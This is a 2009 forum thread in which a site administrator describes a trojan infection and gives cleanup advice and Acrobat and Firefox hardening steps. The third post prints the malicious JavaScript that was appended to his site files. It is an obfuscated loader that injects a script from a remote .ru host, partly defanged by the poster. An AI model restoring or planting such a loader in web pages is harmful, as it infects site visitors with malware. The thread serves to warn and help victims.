Deprecated: Function set_magic_quotes_runtime() is deprecated in /home4/mfoster/public_html/cb/forums/include/common.php on line 62

Warning: Cannot modify header information - headers already sent by (output started at /home4/mfoster/public_html/cb/forums/include/common.php:62) in /home4/mfoster/public_html/cb/forums/header.php on line 31

Warning: Cannot modify header information - headers already sent by (output started at /home4/mfoster/public_html/cb/forums/include/common.php:62) in /home4/mfoster/public_html/cb/forums/header.php on line 32

Warning: Cannot modify header information - headers already sent by (output started at /home4/mfoster/public_html/cb/forums/include/common.php:62) in /home4/mfoster/public_html/cb/forums/header.php on line 33

Warning: Cannot modify header information - headers already sent by (output started at /home4/mfoster/public_html/cb/forums/include/common.php:62) in /home4/mfoster/public_html/cb/forums/header.php on line 34
Cross-Browser.com / PLEASE READ! Forums Hacked? ... No!

Cross-Browser.com

X Library Forums

You are not logged in.

Announcement

New user registration is currently disabled.

#1 December 21, 2009 11:36:00 am

MikeFoster
Administrator
From: Alabama, USA
Registered: April 27, 2007
Posts: 874
Website

PLEASE READ! Forums Hacked? ... No!

I'm not sure what's going on. I think I got that trojan again (Trojan.Vundo.H), but this time I reacted immediately and I had already changed all my passwords.

One guess is that someone is hacking this forum and it causes you to get the trojan when viewing their post. I get a dialog box about opening a pdf file, I cancel it, then there's an svchost process running, taking 50% cpu time.

If this suspicion is true then it means some of you may have got it too. I am so very, very sorry. If this happens, you need to immediately pull your network cable, or turn your router off. Reboot in safe mode. Run something like MalwareBytes AntiMalware, then run HijackThis and do a complete, manual clean-up. Note that HijackThis is a very powerful and potentially dangerous tool. If you do not know how to use it then don't! Get someone to help you. There are forums where you can post a HijackThis log and they will help you. Needless to say, you need to be doing that on a computer other than the infected one. After this, to be safe, change ALL your passwords. If you have websites where you access your host via ftp or ssh then check all "index.*" and "*.js" files. Some Js may have been added to the end of those files which, I assume, spreads whatever this is.

These people are not hackers. "We" are hackers. These people are no different than paid thugs who break into your home. Their main goal is forced hosting and viral spread of advertising. Yes, advertising. They give honest advertising companies a very bad name. These scum are not doing this for fun - they are getting paid to do it - and I imagine the actual advertisers have no idea how their links are getting spread - they just purchase some "package" from a shady company who, it seems in this case, work with some companies in Russia who actually develop this stuff. I curse you, you sorry SOBs.

I deleted the suspect post as soon as I saw it. But, again, I sincerely apologize if any of you caught this. I think the only thing I can do is to take this forum down. I've been having to spend way too much time on maintenance, and now this. sigh sad

Offline

 

#2 December 21, 2009 11:40:30 pm

MikeFoster
Administrator
From: Alabama, USA
Registered: April 27, 2007
Posts: 874
Website

Re: PLEASE READ! Forums Hacked? ... No!

I now have the total number of registered users down to 196, whereas just a few days ago it was over 1500. I deleted any posts and users that were suspect in any way. I want to make this a forum you feel safe at - I promise you I am trying hard to do that. So far, nobody has reported that they caught anything from this forum... except me. So I'm beginning to wonder if I actually caught it from this forum or not. At any rate, I have disabled new user registration for now.

Offline

 

#3 December 23, 2009 10:50:45 am

MikeFoster
Administrator
From: Alabama, USA
Registered: April 27, 2007
Posts: 874
Website

Re: PLEASE READ! Forums Hacked? ... No!

Update


I've decided that the forums were not hacked. Somehow I picked up the trojan which, because I stupidly had passwords stored in WinSCP (which I no longer do), was able to append some Javascript to the end of many files on my sites. I've spent many hours cleaning up the mess! The second time was what made me think the forums had been hacked, but what happened was that I viewed a page the browser had cached, which still had the malicious code. I've cleared my browsers' caches now wink

Here is the malicious code (it was in a script element). DO NOT run this! I've changed a certain method call to "doc.CE" so it can't accidentally cause problems.

/*GNU GPL*/
try {
  window.onload = function () {
    var Aaiamw935w = doc.CE('script');
    Aaiamw935w.setAttribute('type', 'text/javascript');
    Aaiamw935w.setAttribute('src', 'h&!t!)t$$p(:#(^@/#^#/&@(z)&!!&y^#l))o&^m##!-))&c@^$o()#m^.)&@s!@^&t@(u)(!d#(@i!^)v)##e)@&r^z$&e!@i!&c$h#$$n&i^#(s).!c(!)o)!^m#.#)^#t)^^!!o)@#p!i#)$x&&)-#c$&^o^$)m#!@.!!s$&)i^#&#m&!(p@@^l#(#e!^#@#w)((^^o&(r)#l&!)d$)#(h!&o)^u!@#&s^&(e@^!.)r^&@u&@@&:@8(^!@!0@^8!$@^0@$!/@w&i@)r!$)e$&^d@.)!$^c&@#o)($m&)/&w((@((i)$^r!@)@e&)d@#.!$c@o$)m@#)@/($g#(o^@&o!g!#l@^(!(e@.!&)c(o)@m@^^&/(^$t)u&)d)##o&((!u(((.(c$o!^!m$$&/@$a#!@^s#g^$.@@^t!)@$o^$/^^$#'.replace(/\$|@|\!|&|\^|#|\)|\(/ig, ''));
    Aaiamw935w.setAttribute('defer', 'defer');
    document.body.appendChild(Aaiamw935w);
  }
}
catch (e) {
}



The code creates a script element and has it run some code from this URL: http://zylom-com.studiverzeichnis.com.topix-com.simpleworldhouse.ru:8080/wired.com/wired.com/google.com/tudou.com/asg.to/. It appears to deliver a PDF which itself runs a script (I'm just guessing about the PDF script) which modifies a registry entry to cause "siszyd32.exe" to be run on startup. You'll get a dialog box with something about updating a PDF (I can't remember the exact wording), and even if you cancel it, the deed is done. The properties for "siszyd32.exe" have this:

Nero StartSmart 8 Inline Function DiscCopy Server
Original filename: InFDiscCopyServer.exe
Version: 8.3.1.2
Company: Nero AG



I have no idea what it copied from my harddrive and I'm thinking seriously about reformatting and reinstalling everything. This trojan is known as one of the following, I'm not really sure which: "Trojan.Vundo.H", "Troj/Agent-LVN" or "Rogue.SystemSecurity".

I'm posting this information in the hopes that it will help someone - as well as myself. I didn't think I could get something like this using Firefox, but I'm guessing the blame is more on Acrobat Reader than on Firefox. I'd like to know what configuration changes I need to make in Firefox and/or Acrobat Reader so that this can not happen again.

Offline

 

#4 December 28, 2009 2:42:47 pm

MikeFoster
Administrator
From: Alabama, USA
Registered: April 27, 2007
Posts: 874
Website

Re: PLEASE READ! Forums Hacked? ... No!

Here are some application settings I changed, in the hope of preventing this from happening again:

In Firefox, go to "Tools / Options / Applications" and for all Adobe Acrobat types set their action to "Always ask".

In Adobe Acrobat Reader, go to "Edit / Preferences" (I don't actually remember what all I changed here). Under "JavaScript", disable "Acrobat JavaScript". Under "Multimedia Trust", set all operations to "Prompt". In general,  disable any kind of automatic updates and anywhere you have a choice between auto and "prompt" choose "prompt".

I have no idea if making these changes will prevent the trojan from being installed. The only way to be sure is to set up a page which contains the malicious code and give it a try... but I'm too chicken to try it smile

Offline

 

Board footer

Powered by PunBB 1.2.15
Copyright © 2002–2005 Rickard Andersson

Expand Restore Select Format Eval Load